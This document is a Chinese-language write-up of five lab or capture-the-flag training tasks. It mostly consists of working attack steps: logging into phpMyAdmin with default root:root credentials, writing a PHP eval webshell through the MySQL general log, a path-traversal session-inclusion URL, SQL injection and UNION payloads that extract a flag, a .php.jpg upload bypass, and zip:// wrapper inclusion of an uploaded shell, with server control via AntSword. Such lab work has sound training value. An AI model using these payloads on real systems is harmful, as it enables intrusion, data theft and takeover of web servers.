實訓任務1 漏洞攻擊實戰一
使用 御劍 得到網站后臺地址
????????
數據庫登錄與日志配置??
- 使用默認密碼?
root:root
?登錄phpMyAdmin,執行?SHOW VARIABLES LIKE 'general%'
?查看日志狀態。
- 開啟日志功能:
set global general_log = "ON";
(配圖:SQL執行成功提示)。
??日志寫入Webshell??
- 修改日志路徑到Web目錄:
????set global general_log_file='C:/phpStudy/PHPTutorial/WWW/shell.php';
- 執行?
SELECT '<?php @eval($_POST[1]);?>'
?寫入木馬。
??連接Webshell??
- 訪問?
http://靶機IP/shell.php
,使用中國蟻劍成功連接。
????????
實訓任務2 漏洞攻擊實戰二
????????御劍掃描網站后臺
????????
? ? ? ? 發現存在www.zip文件(管理員備份文件)
存在數據庫后臺登錄賬號密碼
運行SELECT “ <?php file_put_contents('shell.php','<?php @eval($_POST[1]);?>');?>”
生成shell.php文件(未生成)
構造url運行存在session的sql命令生成shell文件
http://xxx.xx.xx.xxx:xxx/phpmyadmin/index.php?target=db_sql.php%253f/../../../../../../../../var/lib/php/sessions/sess_此處為步驟7獲取到的sessionID
??連接Webshell?
訪問?http://靶機IP/shell.php
,使用中國蟻劍成功連接。
實訓任務3 白云新聞搜索
-
??繞過過濾與注入驗證??
- 發現輸入被轉義,使用
'
觸發報錯。
- 發現輸入被轉義,使用
- 設置瀏覽器禁止使用JavaScript
- 構造永真條件:
' OR 1=1 -- '
,確認存在注入。
- 構造永真條件:
-
??Union查詢提取數據??
- 確定列數后,聯合查詢表名:
' union select 1,TABLE_SCHEMA,TABLE_NAME from INFORMATION_SCHEMA.tables -- '' union select 1,COLUMN_NAME,3 from INFORMATION_SCHEMA.columns -- '' union select 1,2,flag from admin -- '
- 確定列數后,聯合查詢表名:
? ? ? ? 得到flag{fabbf4abe040f2fdac8234099facdccb}
實訓任務4 手速要快
-
??繞過前端驗證??
- 修改文件后綴為
.php.jpg
??????<?php @eval($_POST[123]);?>
。?
- 修改文件后綴為
-
??訪問Webshell??
- 通過目錄遍歷找到上傳路徑:http://192.168.210.83/uploads/1.php.jpg。
- 通過目錄遍歷找到上傳路徑:http://192.168.210.83/uploads/1.php.jpg。
? ? ? ? ? ? ? ? ? ? ? ?
實訓任務5 包羅萬象
? ? ? ? 將php文件壓縮上傳
????????
??上傳ZIP并觸發解壓??
????????????????上傳包含shell.php
的ZIP文件,利用偽協議包含:
http://192.168.210.84/index.php?url=zip:///var/www/html/upload/eee6b96824b2ab9ab6db41e36355eb89.zip%231
????????????????%23 轉譯為#? ? ‘1’ 應該與壓縮包內的php文件同名
??獲取服務器權限??
- 通過中國蟻劍管理服務器文件系統。